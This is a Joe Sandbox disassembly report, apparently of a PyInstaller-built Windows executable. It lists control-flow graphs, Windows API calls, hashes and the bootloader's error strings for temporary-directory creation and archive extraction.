                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                                        • String ID: %s\*
                                                                                                                                                                                                                                                        • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                                        • Opcode ID: d57e7e696b90763087bb52608de81a3ef4359c1814b552ec37b5c7e1afda5017
                                                                                                                                                                                                                                                        • Instruction ID: 856e71a0c37ca97cc46def55b63cabb129e7d87b1c1c2926a2d20e6b4deb6992
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d57e7e696b90763087bb52608de81a3ef4359c1814b552ec37b5c7e1afda5017
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B9417431A0E58691EA709B24E4541BD6360FB9C794F500632D79EC36A6FF3CD546C700

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 1040 7ff6aba670ec-7ff6aba67121 call 7ff6aba667f8 call 7ff6aba66800 call 7ff6aba66868 1047 7ff6aba67127-7ff6aba67132 call 7ff6aba66808 1040->1047 1048 7ff6aba6725f-7ff6aba672cd call 7ff6aba5b844 call 7ff6aba627e8 1040->1048 1047->1048 1053 7ff6aba67138-7ff6aba67143 call 7ff6aba66838 1047->1053 1059 7ff6aba672db-7ff6aba672de 1048->1059 1060 7ff6aba672cf-7ff6aba672d6 1048->1060 1053->1048 1061 7ff6aba67149-7ff6aba6716c call 7ff6aba5b464 GetTimeZoneInformation 1053->1061 1063 7ff6aba67315-7ff6aba67328 call 7ff6aba5e6c4 1059->1063 1064 7ff6aba672e0 1059->1064 1062 7ff6aba6736b-7ff6aba6736e 1060->1062 1071 7ff6aba67172-7ff6aba67193 1061->1071 1072 7ff6aba67234-7ff6aba6725e call 7ff6aba667f0 call 7ff6aba667e0 call 7ff6aba667e8 1061->1072 1066 7ff6aba672e3 call 7ff6aba670ec 1062->1066 1068 7ff6aba67374-7ff6aba6737c call 7ff6aba66e70 1062->1068 1075 7ff6aba6732a 1063->1075 1076 7ff6aba67333-7ff6aba6734e call 7ff6aba627e8 1063->1076 1064->1066 1077 7ff6aba672e8-7ff6aba67314 call 7ff6aba5b464 call 7ff6aba4bb10 1066->1077 1068->1077 1078 7ff6aba67195-7ff6aba6719b 1071->1078 1079 7ff6aba6719e-7ff6aba671a5 1071->1079 1082 7ff6aba6732c-7ff6aba67331 call 7ff6aba5b464 1075->1082 1097 7ff6aba67355-7ff6aba67367 call 7ff6aba5b464 1076->1097 1098 7ff6aba67350-7ff6aba67353 1076->1098 1078->1079 1085 7ff6aba671a7-7ff6aba671af 1079->1085 1086 7ff6aba671b9 1079->1086 1082->1064 1085->1086 1093 7ff6aba671b1-7ff6aba671b7 1085->1093 1091 7ff6aba671bb-7ff6aba6722f call 7ff6aba6b740 * 4 call 7ff6aba63dcc call 7ff6aba67384 * 2 1086->1091 1091->1072 1093->1091 1097->1062 1098->1082
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6ABA6711A
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA66868: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6ABA6687C
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6ABA6712B
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA66808: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6ABA6681C
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6ABA6713C
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA66838: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6ABA6684C
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA5B464: RtlFreeHeap.NTDLL(?,?,?,00007FF6ABA63F92,?,?,?,00007FF6ABA63FCF,?,?,00000000,00007FF6ABA64495,?,?,?,00007FF6ABA643C7), ref: 00007FF6ABA5B47A
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA5B464: GetLastError.KERNEL32(?,?,?,00007FF6ABA63F92,?,?,?,00007FF6ABA63FCF,?,?,00000000,00007FF6ABA64495,?,?,?,00007FF6ABA643C7), ref: 00007FF6ABA5B484
                                                                                                                                                                                                                                                        • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6ABA6737C), ref: 00007FF6ABA67163
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                                        • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                                        • API String ID: 3458911817-239921721
                                                                                                                                                                                                                                                        • Opcode ID: fce0b41cc66c7972387442f4a259984a91ef9247f86000003104344bdc7b7ed6
                                                                                                                                                                                                                                                        • Instruction ID: 1d7e112caf563885080e66e9511e79cdb2b099a24041715aecf5c38339dfdda3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fce0b41cc66c7972387442f4a259984a91ef9247f86000003104344bdc7b7ed6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3851A2B6A1A68286E720DF79D8A15A96761FB4C784F404136EF4DC7AB6FF3CE4018740
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2295610775-0
                                                                                                                                                                                                                                                        • Opcode ID: c8bb1e00aee5117eaed99adb2432ba14ac7573cdfbb2fa81c580c042f8a510df
                                                                                                                                                                                                                                                        • Instruction ID: 5b9e9941b3913537f5739da0eeb356417746f5a7c6536a1da6d2b80827b14434
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c8bb1e00aee5117eaed99adb2432ba14ac7573cdfbb2fa81c580c042f8a510df
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F5F06876A2A64586F7A08B64B4593667350FB887A8F444335DBBE426E4EF7CD0198B00
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1010374628-0
                                                                                                                                                                                                                                                        • Opcode ID: de90d4660cad73c020d10a8b6ecdb18ed9fa62073eb22c4578e43967cc91730a
                                                                                                                                                                                                                                                        • Instruction ID: 8669cdfd9de8493e2fc333336f487655ac70c3ea99628f0136ebec7bbeb92f6a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: de90d4660cad73c020d10a8b6ecdb18ed9fa62073eb22c4578e43967cc91730a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FA02CFA1B0FB4240FE65AF2994602796A94EF4DB90F455635DF1EC67F2FE3DA8019300
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                                        • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$hide-early$hide-late$minimize-early$minimize-late$pkg$pyi-contents-directory$pyi-hide-console$pyi-python-flag$pyi-runtime-tmpdir
                                                                                                                                                                                                                                                        • API String ID: 2776309574-3325264605
                                                                                                                                                                                                                                                        • Opcode ID: a934bdd3807bdc1780f6dc89ab613ad8fd0c06ef33938902dbcf83096bcc19a5
                                                                                                                                                                                                                                                        • Instruction ID: 141e423a49e5a16d6529f02195e0f9d4b7848468d1802a4afc2d3722792c4930
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a934bdd3807bdc1780f6dc89ab613ad8fd0c06ef33938902dbcf83096bcc19a5
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F428D61A1E68291FB25EB25E4152F96691EF5C784F844132DB9EC22F6FF2CF549C300

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 357 7ff6aba41930-7ff6aba4196b call 7ff6aba439d0 360 7ff6aba41971-7ff6aba419b1 call 7ff6aba473d0 357->360 361 7ff6aba41c2e-7ff6aba41c52 call 7ff6aba4bb10 357->361 366 7ff6aba419b7-7ff6aba419c7 call 7ff6aba4fc2c 360->366 367 7ff6aba41c1b-7ff6aba41c1e call 7ff6aba4f5a4 360->367 372 7ff6aba419c9-7ff6aba419e3 call 7ff6aba55e48 call 7ff6aba42020 366->372 373 7ff6aba419e8-7ff6aba41a04 call 7ff6aba4f8f4 366->373 371 7ff6aba41c23-7ff6aba41c2b 367->371 371->361 372->367 379 7ff6aba41a06-7ff6aba41a20 call 7ff6aba55e48 call 7ff6aba42020 373->379 380 7ff6aba41a25-7ff6aba41a3a call 7ff6aba55e68 373->380 379->367 387 7ff6aba41a3c-7ff6aba41a56 call 7ff6aba55e48 call 7ff6aba42020 380->387 388 7ff6aba41a5b-7ff6aba41adc call 7ff6aba41c60 * 2 call 7ff6aba4fc2c 380->388 387->367 399 7ff6aba41ae1-7ff6aba41af4 call 7ff6aba55e84 388->399 402 7ff6aba41af6-7ff6aba41b10 call 7ff6aba55e48 call 7ff6aba42020 399->402 403 7ff6aba41b15-7ff6aba41b2e call 7ff6aba4f8f4 399->403 402->367 409 7ff6aba41b30-7ff6aba41b4a call 7ff6aba55e48 call 7ff6aba42020 403->409 410 7ff6aba41b4f-7ff6aba41b6b call 7ff6aba4f668 403->410 409->367 416 7ff6aba41b6d-7ff6aba41b79 call 7ff6aba41e50 410->416 417 7ff6aba41b7e-7ff6aba41b8c 410->417 416->367 417->367 421 7ff6aba41b92-7ff6aba41b99 417->421 423 7ff6aba41ba1-7ff6aba41ba7 421->423 424 7ff6aba41ba9-7ff6aba41bb6 423->424 425 7ff6aba41bc0-7ff6aba41bcf 423->425 426 7ff6aba41bd1-7ff6aba41bda 424->426 425->425 425->426 427 7ff6aba41bdc-7ff6aba41bdf 426->427 428 7ff6aba41bef 426->428 427->428 430 7ff6aba41be1-7ff6aba41be4 427->430 429 7ff6aba41bf1-7ff6aba41c04 428->429 431 7ff6aba41c06 429->431 432 7ff6aba41c0d-7ff6aba41c19 429->432 430->428 433 7ff6aba41be6-7ff6aba41be9 430->433 431->432 432->367 432->423 433->428 434 7ff6aba41beb-7ff6aba41bed 433->434 434->429
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA473D0: _fread_nolock.LIBCMT ref: 00007FF6ABA4747A
                                                                                                                                                                                                                                                        • _fread_nolock.LIBCMT ref: 00007FF6ABA419FB
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA42020: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6ABA41B4A), ref: 00007FF6ABA42070
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                                        • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                                        • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                                        • Opcode ID: 77b5bceb95b2de1e1f0885317eeacdcfaf3677dc8f04d310bb9146bf4f5e1f65
                                                                                                                                                                                                                                                        • Instruction ID: c99e08ed026b7ecc37721b5acf7883f0d2bc68bd456e0475c984ad8e7455938e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 77b5bceb95b2de1e1f0885317eeacdcfaf3677dc8f04d310bb9146bf4f5e1f65
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4C819371A0EA8285EB50DB25D4507BA27A1FF4C784F444036DB8DC77A6FE7CE5859B00

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 435 7ff6aba415e0-7ff6aba415f1 436 7ff6aba41617-7ff6aba41631 call 7ff6aba439d0 435->436 437 7ff6aba415f3-7ff6aba415fc call 7ff6aba41030 435->437 444 7ff6aba41633-7ff6aba41661 call 7ff6aba55e48 call 7ff6aba42020 436->444 445 7ff6aba41662-7ff6aba4167c call 7ff6aba439d0 436->445 442 7ff6aba4160e-7ff6aba41616 437->442 443 7ff6aba415fe-7ff6aba41609 call 7ff6aba41e50 437->443 443->442 452 7ff6aba41698-7ff6aba416af call 7ff6aba4fc2c 445->452 453 7ff6aba4167e-7ff6aba41693 call 7ff6aba41e50 445->453 460 7ff6aba416d9-7ff6aba416dd 452->460 461 7ff6aba416b1-7ff6aba416d4 call 7ff6aba55e48 call 7ff6aba42020 452->461 459 7ff6aba41801-7ff6aba41804 call 7ff6aba4f5a4 453->459 468 7ff6aba41809-7ff6aba4181b 459->468 462 7ff6aba416f7-7ff6aba41717 call 7ff6aba55e84 460->462 463 7ff6aba416df-7ff6aba416eb call 7ff6aba411f0 460->463 474 7ff6aba417f9-7ff6aba417fc call 7ff6aba4f5a4 461->474 475 7ff6aba41719-7ff6aba4173c call 7ff6aba55e48 call 7ff6aba42020 462->475 476 7ff6aba41741-7ff6aba4174c 462->476 470 7ff6aba416f0-7ff6aba416f2 463->470 470->474 474->459 488 7ff6aba417ef-7ff6aba417f4 475->488 479 7ff6aba417e2-7ff6aba417ea call 7ff6aba55e70 476->479 480 7ff6aba41752-7ff6aba41757 476->480 479->488 483 7ff6aba41760-7ff6aba41782 call 7ff6aba4f8f4 480->483 490 7ff6aba417ba-7ff6aba417c6 call 7ff6aba55e48 483->490 491 7ff6aba41784-7ff6aba4179c call 7ff6aba50034 483->491 488->474 498 7ff6aba417cd-7ff6aba417d8 call 7ff6aba42020 490->498 496 7ff6aba4179e-7ff6aba417a1 491->496 497 7ff6aba417a5-7ff6aba417b8 call 7ff6aba55e48 491->497 496->483 499 7ff6aba417a3 496->499 497->498 502 7ff6aba417dd 498->502 499->502 502->479
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                                        • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                                        • Opcode ID: 293de209e359a31f03b73217838b01d94e9e1d4a78e3dadeeef6acb4d91c5efd
                                                                                                                                                                                                                                                        • Instruction ID: fab6401febe304b7408b6a923833a3b96d8ee2e7eebae92c690a655ace13e2fd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 293de209e359a31f03b73217838b01d94e9e1d4a78e3dadeeef6acb4d91c5efd
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2751AE61B0AA4392EA10AB15A4102BA6791FF8C794F844132EF4C87BB6FE3CE555D740

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetTempPathW.KERNEL32(FFFFFFFF,00000000,?,00007FF6ABA43101), ref: 00007FF6ABA47D44
                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00007FF6ABA43101), ref: 00007FF6ABA47D4A
                                                                                                                                                                                                                                                        • CreateDirectoryW.KERNELBASE(?,00007FF6ABA43101), ref: 00007FF6ABA47D8C
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA47E70: GetEnvironmentVariableW.KERNEL32(00007FF6ABA42C4F), ref: 00007FF6ABA47EA7
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA47E70: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6ABA47EC9
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA59174: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6ABA5918D
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Environment$CreateCurrentDirectoryExpandPathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                                        • API String ID: 365913792-1339014028
                                                                                                                                                                                                                                                        • Opcode ID: 93349d7b9616cd7418fb1fb7d836f55c0d98c0562c0ac1a5b6313c198f173f9d
                                                                                                                                                                                                                                                        • Instruction ID: c6ebce326b66ee6c4dc548f9d79dd2f3de40793b4bec4d191f10a24fed5c88ba
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 93349d7b9616cd7418fb1fb7d836f55c0d98c0562c0ac1a5b6313c198f173f9d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7841A121B1BA8240FA64EB2599652F92251EF8D7C0F505631EF0DC77B7FE3DEA458600

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 782 7ff6aba411f0-7ff6aba4124d call 7ff6aba4b340 785 7ff6aba41277-7ff6aba4128f call 7ff6aba55e84 782->785 786 7ff6aba4124f-7ff6aba41276 call 7ff6aba41e50 782->786 791 7ff6aba41291-7ff6aba412af call 7ff6aba55e48 call 7ff6aba42020 785->791 792 7ff6aba412b4-7ff6aba412c4 call 7ff6aba55e84 785->792 805 7ff6aba41419-7ff6aba4142e call 7ff6aba4b020 call 7ff6aba55e70 * 2 791->805 797 7ff6aba412e9-7ff6aba412fb 792->797 798 7ff6aba412c6-7ff6aba412e4 call 7ff6aba55e48 call 7ff6aba42020 792->798 801 7ff6aba41300-7ff6aba41325 call 7ff6aba4f8f4 797->801 798->805 811 7ff6aba4132b-7ff6aba41335 call 7ff6aba4f668 801->811 812 7ff6aba41411 801->812 819 7ff6aba41433-7ff6aba4144d 805->819 811->812 818 7ff6aba4133b-7ff6aba41347 811->818 812->805 820 7ff6aba41350-7ff6aba41378 call 7ff6aba49780 818->820 823 7ff6aba413f6-7ff6aba4140c call 7ff6aba41e50 820->823 824 7ff6aba4137a-7ff6aba4137d 820->824 823->812 825 7ff6aba413f1 824->825 826 7ff6aba4137f-7ff6aba41389 824->826 825->823 828 7ff6aba4138b-7ff6aba41399 call 7ff6aba50034 826->828 829 7ff6aba413b4-7ff6aba413b7 826->829 833 7ff6aba4139e-7ff6aba413a1 828->833 831 7ff6aba413b9-7ff6aba413c7 call 7ff6aba6b0a0 829->831 832 7ff6aba413ca-7ff6aba413cf 829->832 831->832 832->820 835 7ff6aba413d5-7ff6aba413d8 832->835 838 7ff6aba413af-7ff6aba413b2 833->838 839 7ff6aba413a3-7ff6aba413ad call 7ff6aba4f668 833->839 836 7ff6aba413ec-7ff6aba413ef 835->836 837 7ff6aba413da-7ff6aba413dd 835->837 836->812 837->823 841 7ff6aba413df-7ff6aba413e7 837->841 838->823 839->832 839->838 841->801
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                                        • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                                        • Opcode ID: 30a135f328e13ea8cfa75db9435735ae70663f86d9eb3de89f3f5a6e45aa4292
